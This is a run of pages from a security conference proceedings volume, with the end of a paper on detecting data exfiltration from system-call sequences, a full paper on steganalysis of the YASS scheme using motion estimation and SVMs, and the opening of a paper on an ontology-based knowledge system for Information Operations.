closer to 100%. However, it should be noted that most of the difference between these 2 sets was the<br />
use of a new process in the User 1B profile that wasn't present in the User 1A profile. This type of<br />
anomaly will have to be taken care of in any future implementation.<br />
Differences in profiles among various users are expectedly severe, with the most significant<br />
differences coming from different host operating systems. This is perhaps unsurprising since many of<br />
the system calls that are used by Mac OSX aren't used by Linux and vice versa. The same goes for<br />
Solaris vs. the others as well.<br />
However, this does validate that any model will have to be highly adaptable to the environment and<br />
not rely on a predetermined set of signature detection algorithms. This property does however help us<br />
greatly as mimicry attacks will be extremely difficult to carry out without specific knowledge of the<br />
environment and user's behaviors.<br />
4.3 Responsive<br />
The last of the criteria for evaluating our chosen implementation is the ability to detect a very large<br />
variety of data exfiltrations. For this stage of testing we issued a challenge that was conducted over<br />
the course of 2 days at Oak Ridge National Laboratory (ORNL) during the summer of 2010.<br />
Participants were solicited from the lab to exfiltrate a number of files setup on one of our testing<br />
machines. All participants were asked to exfiltrate 3 files:<br />
A plain text file plainly labeled in a directory and to which all participants had unrestricted access.<br />
A mock transactional database containing simulated sensitive personal financial information that<br />
was hidden within a shared location on the same machine.<br />
A document that was clearly labeled and had a known location but in a user directory with<br />
restricted access.<br />
While this data set will have a number of other uses in the future, it currently gives a good view of<br />
whether it will be feasible to detect attacks in progress and give an idea of what those attacks might<br />
look like. We had originally hoped that our attacks would display some specific similarities to each<br />
other, perhaps manifesting as an increase in certain system call types or some other type of pattern.<br />
However, we found that all of our attacks differed significantly with a wide variety of tactics deployed.<br />
Even those attacks that appeared to use the same tactics of exfiltration displayed very dissimilar<br />
system call sequence profiles.<br />
Overall there were 18 individual UIDs and over 9 gigabytes of alerts observed during the 2-day<br />
period. The size of the dataset collected in contrast to the average observed rate of approximately 2<br />
megabytes of alerts generated under normal operation over the same time period is evidence that our<br />
method is sufficiently sensitive to data exfiltration activities.<br />
Among the 20 observed UIDs, 8 are identifiable as successfully retrieving at least one of the files, and<br />
at least 2 retrieving all three. Observed behaviors included probing with find, privilege escalation<br />
attempts, mass data exfiltrations using the sftp protocol, and transferring the files to a USB flash drive.<br />
The detection of many of these attacks may in some sense be biased given that they were new users<br />
on the system using a distinct UID. However, several of the attacks were observed among both the<br />
root account and the primary users’ UIDs, lending credibility to the system's ability to detect exfiltration<br />
behaviors even when the activity is hidden amongst normal system operation and users. As for the<br />
140
Brian Jewell and Justin Beaver<br />
other attacks that were identified, each of these incidents invoked an alarm as designed, and for our<br />
immediate purposes serve to validate that the implementation is working as intended.<br />
5. Conclusions<br />
The accurate detection of malicious data exfiltration is a complex task that can take human experts<br />
months. However, in order to react to an attack a practical system not only needs to detect attacks<br />
autonomously, but do so in real time before files can be leaked.<br />
The goal of this paper was to identify and test ways to approach this problem. We initially identified<br />
the main issues that separated what we needed in our implementation as opposed to previous work<br />
on HIDSs. We sought a method that would be tractable to run in real time, environmentally neutral as<br />
to perform well with any operating system or conditions, and most importantly responsive to behaviors<br />
specific to data exfiltrations. With these criteria in mind we adapted a means of host-based detection<br />
using sequences of system calls to implement a data exfiltration detection agent.<br />
In all of our testing, we have found that data exfiltration behaviors can be successfully detected by the<br />
relatively simple means of system call sequence analysis in real-time, which can be implemented with<br />
negligible performance impact on user operations. Our adaptation of system call sequence monitoring<br />
to this specific problem is promising and passed our three main evaluation criteria. The<br />
implementation was successfully run in real-time and deployed across a diverse set of systems and<br />
users. We were also able to present evidence that our method detects a wide range of exfiltration<br />
related behaviors.<br />
This work has prompted the question of whether this approach can detect these malicious behaviors<br />
quickly and accurately enough to prevent the data exfiltration. Our future work will focus on correlating<br />
suspicious behaviors to more reliably discriminate malicious behaviors, and further testing of our<br />
methods against known attacks is warranted to determine long-term performance.<br />
Acknowledgements<br />
The views and conclusions contained in this document are those of the authors. This manuscript has<br />
been authored by UT-Battelle, LLC, under contract DE-AC05-00OR22725 with the U.S. Department<br />
of Energy. The United States Government retains and the publisher, by accepting the article for<br />
publication, acknowledges that the United States Government retains a non-exclusive, paid-up,<br />
irrevocable, world-wide license to publish or reproduce the published form of this manuscript, or allow<br />
others to do so, for United States Government purposes.<br />
References<br />
Axelsson, S. (2000) “The Base-Rate Fallacy and the Difficulty of Intrusion Detection.” ACM Transactions on<br />
Information and System Security, Vol. 3 No. 3, pp. 186-205.<br />
Cohen, W.W. (1995) Fast effective rule induction. In Machine Learning: the 12th International <strong>Conference</strong>.<br />
Morgan Kaufmann.<br />
Coleman, K.G. (2008) “Data Exfiltration.” [online], http://it.tmcnet.com/topics/it/articles/37876-data-exfiltration.htm.<br />
Dtrace (2009), [online], http://www.oracle.com/technetwork/systems/dtrace/dtrace/index.html.<br />
Endler, D. (1998) Intrusion detection: applying machine learning to solaris audit data. In In Proc. of the IEEE<br />
Annual Computer Security Applications <strong>Conference</strong>, pages 268–279. Society Press.<br />
Fidelis Security Systems, (2009) “Fidelis Extrusion Prevention System”. [online], http://www.fidelissecurity.com/.<br />
Forrest, S. et al. (1996) A sense of self for UNIX processes. In Proceedings of the 1996 IEEE Symposium on<br />
Security and Privacy, pages 120–128, Los Alamitos, CA, IEEE Computer Society Press.<br />
Forrest, S. et al. (2008) “The Evolution of System-call Monitoring”, 2008 Annual Computer Security Applications<br />
<strong>Conference</strong>.<br />
Gao, D. et al (2006) Behavioral distance measurement using hidden markov models. In D. Zamboni and C.<br />
Kruegel, editors, Research Advances in Intrusion Detection, LNCS 4219, pages 19–40, Berlin Heidelberg,<br />
Springer-Verlag.<br />
Ghosh, A. and Schwartzbard, A. (1999) A study in using neural networks for anomaly and misuse detection. In<br />
Proceedings of the 8th USENIX Security Symposium.<br />
Giani, A. et al. (2004) “Data Exfiltration and Covert Channels.” In Proceedings of the SPIE 2004 Defense and<br />
Security Symposium.<br />
Hooper, E. (2009) “Intelligent Strategies for Secure Complex Systems Integration and Design, Effective Risk<br />
Management and Privacy.” In Proceedings of the 3rd Annual IEEE International Systems <strong>Conference</strong>.<br />
Kang, D. et al. (2005) “Learning Classifiers for Misuse and Anomaly Detection Using a Bag of System Calls<br />
Representation”, Proceedings of the 2005 Workshop on Information Assurance and Security, 2005.<br />
141
Brian Jewell and Justin Beaver<br />
Kosoresow, A.P. and Hofmeyr, S.A. (1997) Intrusion detection via system call traces. IEEE Software, 14(5):35–<br />
42.<br />
Kymie, M.C.T and Maxion, R. (2002) “”Why 6?’ Defining the Operational Limits of stide, an Anomaly-Based<br />
Intrusion Detector."<br />
Lee, W. et al. (1997) Learning patterns from UNIX process execution traces for intrusion detection. In AAAI<br />
Workshop on AI Approaches to Fraud Detection and Risk Management, pages 50–56. AAAI Press.<br />
Lee, W. and Stolfo, S.J. (1998) Data mining approaches for intrusion detection. In Proceedings of the 7th<br />
USENIX Security Symposium.<br />
(Liao 2002) Y. Liao and V. R. Vemuri. Use of k-nearest neighbor classifier for intrusion detection. Computers &<br />
Security, 21(5):439–448, 2002.<br />
Liu, Y. et al. (2009) “SIDD: A Framework for Detecting Sensitive Data Exfiltration by an Insider Attack.” In<br />
Proceedings of the 42nd Hawaii International <strong>Conference</strong> on System Sciences, 2009.<br />
McAfee (2003), [online], http://www.mcafee.com/us/.<br />
Richardson, R. (2007) CSI Computer Crime and Security Survey, [online],<br />
http://icmpnet.com/v2.gocsi.com/pdf/CSISurvey2007.pdf.<br />
Sans Institute. (2010) “20 Critical Security Controls, Critical Control 15: Data Loss Prevention.” [online],<br />
http://www.sans.org/critical-security-controls/control.php?id=15<br />
Warrender, C. et al (1999) "Detecting Intrusions Using System Calls: Alternative Data Models." In 1999 IEEE<br />
Symposium on Security and Privacy.<br />
142
Detection of YASS Using Calibration by Motion Estimation<br />
Kesav Kancherla and Srinivas Mukkamala<br />
(ICASA) / (Canes) / New Mexico Institute of Mining and Technology USA<br />
kancherla@cs.nmt.edu<br />
srinivas@cs.nmt.edu<br />
Abstract: Through this paper we propose a new approach to thwart defects of current blind steganalysis<br />
methods. “Yet Another Steganographic Scheme” (YASS) is a robust steganographic scheme that embeds data in<br />
random locations based on a secret key. Due to this randomization the current steganalysis schemes such as<br />
self calibration methods do not detect YASS. In this work, we present a new calibration method using Motion<br />
Estimation and extract higher order features. In our methodology motion estimation technique is applied on an<br />
image, to estimate its actual image. We assume that the estimated image captures the features of the actual<br />
image, due to spatial redundancy in the images. We extract two sets of features; DCT based features from DCT<br />
domain and Markov model based features from spatial domain, and apply Support Vector Machines (SVMs) on<br />
these feature sets. Our approach against YASS using different block sizes (9, 10, 12, and 14), compression rates<br />
(50-50, 50/75, and 75/75) and coefficients used for embedding data (12 and 19) obtained an accuracy of about<br />
95%, even for bigger block lengths and low embedding rates. This methodology can be used as blind<br />
steganalysis technique, as detection is based on modification of an image rather than steganographic scheme.<br />
Keywords: blind steganalysis, Discrete Cosine Transform (DCT), motion estimation, steganalysis, Support<br />
Vector Machines (SVM)<br />
1. Introduction<br />
Steganography is the science of embedding data into cover object in covert communication. The rapid<br />
growth in internet and digital media causes an increasing threat of using steganography for covert<br />
communication. Steganographic images are not perceivable to human eye but embedding data into<br />
images change the statistics of images. The goal of a steganalyst is to use these statistical changes<br />
to detect the presence of any hidden message.<br />
Fridrich used second order statistics in her research of self-calibration method for blind Steganalysis<br />
(Fridrich, 2004: 67-81). In self-calibration technique, a given image is first decompressed and few<br />
rows and columns are cropped. The cropped image is recompressed using the same quality factor,<br />
and difference between the features extracted from actual image and cropped image is used to detect<br />
steganograms. To detect well-known steganographic schemes like Outguess, F5 and Model Based<br />
steganography schemes (Provos, 2001: 24; Westfeld, 2001: 289-302; Sallee, 2005: 167-190); Farid<br />
proposed the use of wavelet based features for JPEG Steganalysis (Lyu and Farid, 2002: 340-354),<br />
Shi proposed the use of transition matrix as features for detecting steganograms (Shi et al, 2006: 249-<br />
264), Fridrich used merged Discrete Cosine Transform (DCT) and Markov features for implementing a<br />
multi-class JPEG steganalysis classification (Pevny and Fridrich, 2007: 1-13) and Chen proposed<br />
Markov based features using intra-block and inter-block correlation of DCT coefficients (Chen and<br />
Shi, 2008: 3029-3032).<br />
Outguess embeds data by replacing least significant bit and preserves the first order statistics by<br />
performing additional changes, F5 algorithm uses matrix embedding to reduce the number of changes<br />
needed to embed data. And Model-based steganography tries to preserve histograms of individual<br />
AC DCT models after embedding the data. However the current steganalysis techniques can detect<br />
these steganography methods. “Yet Another Steganography Scheme” (YASS) by (Solanki, Sarkar<br />
and Manjunath, 2007: 16-31) is a new steganography scheme that resists the above steganalysis<br />
methods. YASS embeds data at random locations and uses Quantization Index Modulation (QIM) to<br />
increase robustness of data. Even though it cannot be detected using current self-calibration<br />
methods, embedding data still changes the statistical properties of image.<br />
In (Li, Shi and Huang, 2008: 139-148), the authors present a targeted attack on YASS. They showed<br />
that due to QIM embedding scheme used in YASS, there is an increase in number of zero DCT<br />
coefficients in stego image. Thus there is a notable difference between statistics of embedded block<br />
and the actual block. They also identified the fact that embedding is not random enough for detection<br />
of YASS. However this approach does not work when there are modifications in algorithm. In the<br />
method proposed by (Kodovský, Pevný and Fridrich, 2010: 1-11), the authors used various well<br />
known steganalysis methods for detection of YASS. They used Subtractive Pixel Adjacency Model<br />
143
Kesav Kancherla and Srinivas Mukkamala<br />
(SPAM) of feature set (686 features), Pevný feature set (584 features), Markov Process (MP) feature<br />
set (486 features) and CDF (Cross-Domain Feature) set (1,234 features, combination of SPAM and<br />
Pevny). Except for SPAM remaining features are extracted from DCT domain (Pevny and Fridrich,<br />
2007: 1-13; Chen and Shi, 2008: 3029-3032; Pevny, Bas and Fridrich, 2009 75-84). In Pevny feature<br />
set instead of using difference calibration they used Cartesian calibration thus increasing the feature<br />
set length, however the authors argue the use of difference calibration will affect the performance of<br />
detection. Our approach in this paper is based on difference calibration for detection.<br />
In this paper we propose a novel method that uses calibration for detection. YASS defeats current<br />
calibration methods by embedding data in random location. In our approach, we perform calibration<br />
by estimating image using motion estimation. Motion estimation is widely used in video compression<br />
for capturing temporal redundancies. In our case we use motion estimation on adjacent blocks for<br />
capturing spatial redundancies. After obtaining the estimated image we extract two sets of features:<br />
DCT based features and Markov based features (Pevny and Fridrich, 2007: 1-13). Markov based<br />
features are extracted from spatial domain rather than DCT domain, as embedding is done in spatial<br />
domain. We used Support Vector Machine (SVM) based classifier in our experiments, and obtained<br />
an accuracy of about 95% even for low embedding rates. This paper is organized in sections, section<br />
2 gives a brief discussion of YASS algorithm, section 3 gives outline of our approach, section 4 gives<br />
a brief overview of features used, and section 5 contains results obtained using this approach<br />
followed by conclusion in section 6.<br />
2. YASS algorithm<br />
For an input image of size MxN, the following steps are involved in YASS (Solanki, Sarkar and<br />
Manjunath, 2007: 16-31)<br />
First the input image is divided into blocks of size BxB (B>8 block size in jpeg images) called bigblock.<br />
For compressed images like jpeg, first the image is decompressed and then divided.<br />
For each big-block, a block of size 8x8 is pseudo randomly selected. This block is called<br />
embedding block. The key for random key generator is shared between the sender and receiver.<br />
For each embedding block we apply two dimensional DCT and divide DCT coefficients with<br />
quantization matrix of design quality factor QFh. Data is embedded into predetermined band of<br />
low frequency AC coefficients using quantization index modulation.<br />
After embedding data, the embedding block is de-quantized using design quality factor and<br />
inverse two dimensional DCT is applied.<br />
After data is embedded in all the embedding blocks, the image is compressed with advertised<br />
quality factor QFa. Generally QFh is not less than QFa.<br />
The random selection of embedding blocks at step 2 will ensure the security from current calibration<br />
based steganalysis methods. As data is embedded at random 8x8 blocks, steganalyst cannot<br />
resynchronize by cropping rows and columns. However the above scheme will reduce the capacity of<br />
embedding. Even though data is embedded at random locations, the statistical properties of DCT<br />
coefficients will change.<br />
Our approach will try to capture these changes by obtaining an estimated image from actual image<br />
using spatial redundancies. This estimation process is similar to motion estimation which is widely<br />
used in video compression techniques. After finding the estimate we model the difference between<br />
the actual and estimated along horizontal, vertical, and diagonal directions in one step Markov<br />
process. We extract DCT and Markov features from actual and estimate. After modeling and<br />
extracting features, we train a SVM based classifier to detect steganalysis.<br />
3. Our approach<br />
The steganalysis scheme consists of three steps: (1) Obtain estimated image from actual image, 2)<br />
Extract high order DCT and Markov features from both actual and estimated image, and (3) Train<br />
SVM classifier using these features. In order to obtain estimated image we use the concept of motion<br />
estimation (Torr and Zisserman, 1999: 278-294), widely used in video compression techniques.<br />
Motion estimation utilizes temporal redundancies in videos for achieving compression.<br />
The video compression process consists of inter frame compression and intra frame compression.<br />
Intra frame compression is more like JPEG compression. Inter frame compression uses the temporal<br />
redundancy in the video frames. In inter frame compression, the current frame is predicted using the<br />
144
Kesav Kancherla and Srinivas Mukkamala<br />
redundant data from the previous frame. In inter frame compression, current frame is divided into 8x8<br />
blocks and a match for each block is found in previous frame. To find a match we search the previous<br />
frames in the near vicinity of the block we are analyzing.<br />
Figure 1: Current block is searched for best in search space and is replaced by it<br />
We apply this concept to images, in order to find estimate. Just like temporal redundancies in videos<br />
we have spatial redundancies in images. We find the best estimate to current block in its vicinity and<br />
replace it with this match. Figure 1 shows the matching procedure, where a best match is found in the<br />
search space. To reduce noise induced due to motion estimation, we used block size of 4x4.<br />
The algorithm for estimating image is given below:<br />
1. First de-compress the image by applying de-quantization and inverse 2 dimensional DCT<br />
2. Divide the decompressed image into blocks of size 4x4<br />
3. For each 4x4 block find the best match at step size 1 pixel in both x-axis and y-axis<br />
4. Replace the actual block with best match<br />
5. After obtaining matched block, apply 2 dimensional DCT and quantization to estimated block<br />
6. Using this image we extract two set of features: DCT based and Markov model based features<br />
4. Feature extraction<br />
In this section we explain briefly about the feature extraction. We extract merged DCT and Markov<br />
features (Pevny and Fridrich, 2007: 1-13) that are used for blind steganalysis. The first sets of<br />
features are DCT based features that are extracted from 23 different functions. These 23 functions<br />
are based on first order and higher order statistics of the quantized DCT coefficients. The second sets<br />
of features are extracted from Markov based models. Here the difference between absolute values of<br />
neighboring pixel coefficients are modeled as Markov process. From these models, we extract cooccurrence<br />
matrix. Due to high dimensionality of these functions, only features at selected locations<br />
and for selected values are taken. We extract a total of 274 features of which 193 are DCT based<br />
features and 81 are Markov based features. The major difference between (Pevny and Fridrich, 2007:<br />
1-13) and our features is, instead of extracting Markov based features in DCT domain, we extract<br />
features in spatial domain only. As embedding is done, we believe Markov features extracted in<br />
spatial domain are effective. A brief description of both sets of features is given below.<br />
4.1 DCT features<br />
The coefficients are denoted dij (k), i, j = 1. . . 8, k = 1. . . nb, where dij (k) denotes the (i, j)-th quantized<br />
DCT coefficient in the k-th block (there are total of nb blocks).<br />
First set of features are histogram of DCT coefficients of image. To reduce dimensionality we only use<br />
histogram of values from -5 to 5<br />
The next 5 functions are histograms of coefficients of 5 individual DCT modes (i, j) ∈ {(1, 2), (2, 1),<br />
(3, 1), (2, 2), (1, 3)} and only the histogram of values {−5. . . 5} are used<br />
145
Kesav Kancherla and Srinivas Mukkamala<br />
ij ij ij<br />
h = ( h , K , h )<br />
(1)<br />
L R<br />
The next 11 functions are dual histograms represented with 8 × 8 matrices g d<br />
i, j,where i, j = 1, . . . , 8,<br />
d =−5, . . . , 5<br />
nB<br />
d<br />
g = ∑δ ( d, dij(<br />
k ))<br />
(2)<br />
ij<br />
k = 1<br />
Where δ(x, y) = 1 if x = y and 0 otherwise. For reducing the features only (i, j) ∈ {(2, 1), (3, 1), (4, 1),<br />
(1, 2), (2, 2), (3, 2), (1, 3), (2, 3), (1, 4)} are taken<br />
The next 6 functions capture inter-block dependency among DCT coefficients. The first function is<br />
variation V<br />
8 | Ir| −1 8 | Ic|<br />
−1<br />
∑∑ ∑∑<br />
| d ( I ( k)) − d ( I ( k+ 1)) | + | d ( I ( k)) − d ( I ( k+<br />
1)) |<br />
ij r ij r ij c ij c<br />
ij , = 1 k= 1 ij , = 1 k=<br />
1<br />
| I | + | I |<br />
r c<br />
Where Ir and Ic denote the vectors of block indices 1. . . nb while scanning the image by rows and by<br />
columns, respectively<br />
The next two functions capture the blockings of the frames<br />
B<br />
⎣⎢( M−1)/8 ⎦⎥ N ⎢⎣( N−1)/8⎥⎦<br />
M<br />
α α<br />
∑ ∑| C8, i j − C8i+ 1, j | + ∑ ∑|<br />
Ci,8 j −Ci,8j+<br />
1|<br />
α =<br />
i= 1 j= 1 j= 1 i=<br />
1<br />
N ⎢⎣( M − 1)/8 ⎥⎦+ M ⎢⎣( N −1)/8⎥⎦<br />
Where M and N are image height and width in pixels and ci, j are grayscale values of the<br />
decompressed JPEG image, α = 1, 2<br />
The last sets of features are co-occurrence matrix of DCT coefficients in neighboring blocks. The cooccurrence<br />
matrix is calculated for values -2 to +2.<br />
4.2 Markov features<br />
From each image F (u, v), we obtain the following difference matrix along the horizontal, vertical,<br />
diagonal and minor diagonal directions.<br />
Fh( u, v) = F( u, v) − F( u+ 1, v)<br />
Fv(,) u v = F(,) u v − F(, u v+<br />
1)<br />
Fd(,) u v = F(,) u v − F( u+ 1, v+<br />
1)<br />
Fm(,) u v = F( u+ 1,) v − F(, u v+<br />
1)<br />
Where F (u, v) is the image u, v gives the pixel location<br />
In order to reduce the dimensionality we consider only the values [-4, +4] in these matrixes. Thus all<br />
the values that is larger than +4 are set to +4 and the values that are smaller than -4 are set to -4.<br />
From these we calculate the transition matrix as follows<br />
146<br />
(3)<br />
(4)
M<br />
M<br />
M<br />
Su−2 Sv<br />
∑∑<br />
u= 1 v=<br />
1<br />
h(,<br />
i j)<br />
=<br />
Su−1 Sv<br />
Su Sv−2<br />
∑∑<br />
u= 1 v=<br />
1<br />
Kesav Kancherla and Srinivas Mukkamala<br />
δ(<br />
Fh( u, v) = i, Fh( u+ 1, v) = j)<br />
∑∑<br />
u= 1 v=<br />
1<br />
v(,<br />
i j)<br />
=<br />
Su Sv−1<br />
Su−2 Sv−2<br />
∑ ∑<br />
u= 1 v=<br />
1<br />
δ(<br />
Fh( u, v) = i)<br />
δ(<br />
Fv( uv , ) = iF , v(<br />
uv , + 1) = j)<br />
∑∑<br />
u= 1 v=<br />
1<br />
d (, i j)<br />
=<br />
Su−1 Sv−1<br />
M<br />
Su−2 Sv−2<br />
∑∑<br />
u= 1 v=<br />
1<br />
δ(<br />
Fuv v(<br />
, ) = i)<br />
δ ( Fd( uv , ) = iF , d(<br />
u+ 1, v+ 1) = j)<br />
∑∑<br />
u= 1 v=<br />
1<br />
m(,<br />
i j)<br />
=<br />
Su−1 Sv−1<br />
u= 1 v=<br />
1<br />
δ ( Fd( u, v) = i)<br />
δ(<br />
Fm( u+ 1, v) = i, Fm( u, v+ 1) = j)<br />
∑∑<br />
δ(<br />
Fm( u, v) = i)<br />
Where Su and Sv are the dimensions of the image and δ (condition) = 1 if only if the conditions are<br />
satisfied. The final features will be the average of the above 4 transition matrix.<br />
5. Results<br />
We used 2000 images in our experiment. From these 2000 images we used 1400 images for training<br />
SVM and 600 images for testing. Each data point consists of 274 features, of which 193 are DCT<br />
features and 81 are Markov features. We used the following parameters for embedding data using<br />
YASS<br />
Three different quality factor modes 50/50, 50/75 and 75/75<br />
Four different block sizes 9, 10, 12 and 14<br />
Low frequency DCT coefficients used for embedding 12 (low) and 19 (high)<br />
We selected block sizes less than 14 as the block size increases the amount of data that can be<br />
embedded decreases. We choose the number coefficients used for embedding 19 because it is used<br />
in YASS (Solanki, Sarkar and Manjunath, 2007: 16-31) paper and value 12 to show the performance<br />
of our steganalysis scheme at low embedding rates. Table 1 and Table 2 give the accuracies<br />
obtained for different parameters at high data and low data respectively.<br />
Table 1: Accuracy obtained for different block sizes, compression rates and coefficients used equal to<br />
19<br />
Advertised-Design Compression rate/ Block Size 9 10 12 14<br />
50-50 99.8 99.7 99.75 99.7506<br />
50-75 97.1737 97.584 97.5894 96.0881<br />
75-75 97.5973 97.6725 97.0075 96.0881<br />
Table 2: Accuracy obtained for different block sizes, compression rates and coefficients used equal to<br />
12<br />
Advertised-Design Compression rate/ Block Size 9 10 12 14<br />
50-50 99.8337 99.5012 99.335 99.47<br />
50-75 96.5087 96.7581 96.84 95.59<br />
75-75 96.59 96.68 95.6775 94.55<br />
We obtained an accuracy of about 99.5 % for 50-50 setting even when we used only 12 coefficients<br />
for embedding. There is a decrease in accuracy as the block size increases for all compression<br />
setting. This is due to the fact that as size of the block increases the embedding capacity decreases.<br />
We obtained an accuracy of above 95% for all setting even when block size is 14 and embedding<br />
147<br />
(5)<br />
(6)<br />
(7)<br />
(8)
Kesav Kancherla and Srinivas Mukkamala<br />
coefficients as 12. Our method performed best when we used 50-50 compression setting. In 50-50<br />
there is more noise added due to compression. As our method is based on using this noise for<br />
detection we obtained better accuracy in 50-50 setting. In next section we explain the model selection<br />
process and Receiver Operation Characteristic (ROC) curves.<br />
5.1 Model selection for SVMs<br />
In any predictive learning task, such as classification, both model and parameter estimation method<br />
should be selected in order to achieve a high level of performance of the learning machine. Recent<br />
approaches allow a wide class of models of varying complexity to be chosen. Then the task of<br />
learning amounts to selecting the sought-after model of optimal complexity and estimating parameters<br />
from training data (Cherkassy, 2002: 109-133; Lee and Lin 2000). Within the SVMs approach, usually<br />
parameters to be chosen are (i) The penalty term C which determines the trade-off between the<br />
complexity of the decision function and the number of training examples misclassified; (ii) The<br />
mapping function and (iii) The kernel function such that . In the case of RBF kernel, the width,<br />
which implicitly defines the high dimensional feature space, is the other parameter to be selected<br />
(Chang and Lin, 2001). Figures 2 and 3 gives the model graph obtained during training.<br />
Figure 2: Model graph obtained during training of SVM obtained for YASS at block size 9,<br />
compression rates 50-50 and coefficients used for embedding equal to 12<br />
Figure 3: Gives model graph obtained during training SVM for YASS at block size 14, compression<br />
rates 75-75 and coefficients used for embedding equal to 10<br />
148
5.2 ROC curves<br />
Kesav Kancherla and Srinivas Mukkamala<br />
ROC is a graphical plot between the sensitivity and specificity. The ROC is used to represent the<br />
plotting of the fraction of true positives (TP) versus the fraction of false positives (FP). The point (0, 1)<br />
is the perfect classifier, since it classifies all positive cases and negative cases correctly. Thus an<br />
ideal system will initiate by identifying all the positive examples and so the curve will rise to (0, 1)<br />
immediately, having a zero rate of false positives, and then continue along to (1, 1). Detection rates<br />
and false alarms are evaluated for steganography data set and obtained results are used to plot the<br />
ROC curves. In each of these ROC plots, the x-axis is the false alarm rate, calculated as the<br />
percentage of normal video frames considered as steganograms; the y-axis is the detection rate,<br />
calculated as the percentage of steganograms detected. A data point in the upper left corner<br />
corresponds to optimal high performance, i.e., high detection rate with low false alarm rate (Egan,<br />
1975) Figures 4 and Figure 5 gives the ROC curves obtained during testing.<br />
Figure 4 Gives the Receiver Operational Characteristics (ROC) curve obtained during steganalysis of<br />
YASS at block size 9, compression rates 50-50 and coefficients used for embedding equal<br />
to 12<br />
Figure 5: Receiver Operational Characteristics (ROC) curve obtained during steganalysis of YASS at<br />
block size 14, compression rates 75-75 and coefficients used for embedding equal to 10<br />
149
Kesav Kancherla and Srinivas Mukkamala<br />
The accuracy of the test depends on how well the test classifies the group being tested into 0 or 1.<br />
Accuracy is measured by the area under the ROC curve (AUC). An Area of 1 represents a perfect test<br />
and an area below .5 represents a worthless test. In our experiment, we got an AUC of 0.9998 and<br />
0.9667 as shown above in Figures 4 and Figure 5.<br />
6. Conclusion<br />
In this paper we propose a steganalysis scheme for YASS. The novelty of our method is to estimate<br />
the image using the concept of motion estimation. Experimental results show that our method is able<br />
to detect YASS even for low embedding rates. Our method is able to detect YASS stegnograms<br />
consistently with accuracy of above 99%, which has compression rates 50-50. In our approach the<br />
accuracy decreases as the block size increases, since less number of bits are embedded. As our<br />
methodology does not use any information regarding steganographic scheme, it can be applied on<br />
any scheme.<br />
References<br />
Chang, C. C. and Lin, C. J. (2001), LIBSVM: a library for support vector machines, Department of Computer<br />
Science and Information Engineering, National Taiwan University.<br />
Chen, C. and Shi, Y. Q. (2008) ‘JPEG image steganalysis utilizing both intrablock and interblock correlations’,<br />
IEEE International Symposium on Circuits and Systems, pp. 3029-3032.<br />
Cherkassy V. (2002) ‘Model complexity control and statistical learning theory’, Journal of Natural Computing, Vol.<br />
1, pp. 109-133.<br />
Egan, J.P (1975), Signal detection theory and ROC analysis, New York: <strong>Academic</strong> Press.<br />
Fridrich, J. (2004) ‘Feature-based steganalysis for JPEG images and its implications for future design of<br />
steganographic schemes’, Information Hiding, <strong>6th</strong> International Workshop, LNCS 3200, pp.67-81.<br />
Kodovský, J., Pevný, T. and Fridrich, J. (2010) ‘Modern steganalysis can detect YASS’, Proceedings SPIE,<br />
Electronic Imaging, Security and Forensics of Multimedia XII, volume 7541, pp. 02–01–02–11.<br />
Lee, J. H. and Lin, C. J. (2000), Automatic model selection for support vector machines, Technical Report,<br />
Department of Computer Science and Information Engineering, National Taiwan University.<br />
Li, B., Shi, Y.Q. and Huang, J. (2008) ‘Steganalysis of YASS’, Proceedings of the 10th ACM Multimedia &<br />
Security Workshop, pp. 139–148.<br />
Lyu, S. and Farid, H. (2002) ‘Detecting hidden messages using higher order statistics and support vector<br />
machines’, Information Hiding, 5th International Workshop, LNCS 2578, pp. 340-354.<br />
Pevny, T. and Fridrich, J. (2007) ‘Merging Markov and DCT features for multi-class JPEG steganalysis’, Proc. of<br />
SPIE Electronic Imaging, Security, Steganography, and Watermarking of Multimedia Contents, volume<br />
6505, pp. 650503-1-650503-13.<br />
Pevný, T., Bas, P. and Fridrich, J. (2009) ‘Steganalysis by subtractive pixel adjacency matrix’, Proceedings of the<br />
11th ACM Multimedia & Security Workshop, pp. 75–84.<br />
Provos, N. (2001) ‘Defending against statistical steganalysis’, 10 th USENIX Security Symposium, Washington<br />
DC, USA, pp. 24.<br />
Sallee, P. (2005) “Model based methods for steganography and steganalysis’, Int. J. Image Graphics, 5(1): 167-<br />
190.<br />
Sarkar A., Solanki, K. and Manjunath, B. S. (2008) ‘Further study on YASS: Steganography based on<br />
randomized embedding to resist blind steganalysis’, Proceedings SPIE, Electronic Imaging, Security,<br />
Forensics, Steganography, and Watermarking of Multimedia Contents, volume 6819, pages 16–31.<br />
Shi, Y. Q., Chen, C. and Chen, W. (2006) ‘A Markov process based approach to effective attacking JPEG<br />
steganography’, Information Hiding, 8th international Workshop, volume 4437, 249-264.<br />
Solanki, K., Sarkar, A. and Manjunath, B. S. (2007) ‘YASS: Yet another steganographic scheme that resists blind<br />
Steganalysis’, Proceedings of 9th Information Hiding Workshop, Saint Malo, France, volume 4567, pp. 16-<br />
31.<br />
Torr, P.H.S. and Zisserman, A. (1999) ‘Feature Based Methods for Structure and Motion Estimation,” ICCV<br />
Workshop on Vision Algorithms, pp. 278-294.<br />
Westfeld, A. (2001) ‘High capacity despite better steganalysis (F5-a steganographic algorithm)’, Information<br />
Hiding, 4th International Workshop, LNCS 2137, pp. 289-302.<br />
150
Developing a Knowledge System for Information<br />
Operations<br />
Louise Leenen, Ronell Alberts, Katarina Britz, Aurona Gerber and Thomas<br />
Meyer<br />
Council for Scientific and Industrial Research, Pretoria, South Africa<br />
lleenen@csir.co.za<br />
ralberts@csir.co.za<br />
abritz@csir.co.za<br />
agerber@csir.co.za<br />
tmeyer@csir.co.za<br />
Abstract: In this paper we describe a research project to develop an optimal information retrieval system in an<br />
Information Operations domain. Information Operations is the application and management of information to gain<br />
an advantage over an opponent and to defend one’s own interests. Corporations, governments, and military<br />
forces are facing increasing exposure to strategic information-based actions. Most national defence and security<br />
organisations regard Information Operations as both a defensive and offensive tool, and some commercial<br />
institutions are also starting to recognise the value of Information Operations. An optimal information retrieval<br />
system should have the capability to extract relevant and reasonably complete information from different<br />
electronic data sources which should decrease information overload. Information should be classified in a way<br />
such that it can be searched and extracted effectively. The authors of this paper have completed an initial phase<br />
in the investigation and design of a knowledge system that can be used to extract relevant and complete<br />
knowledge for the planning and execution of Information Operations. During this initial phase of the project, we<br />
performed a needs analysis and problem analysis and our main finding is the recommendation of the use of<br />
logic-based ontologies: it has the advantage of an unambiguous semantics, facilitates intelligent search, provides<br />
an optimal trade-off between expressivity and complexity, and yields optimal recall of information. The risk of<br />
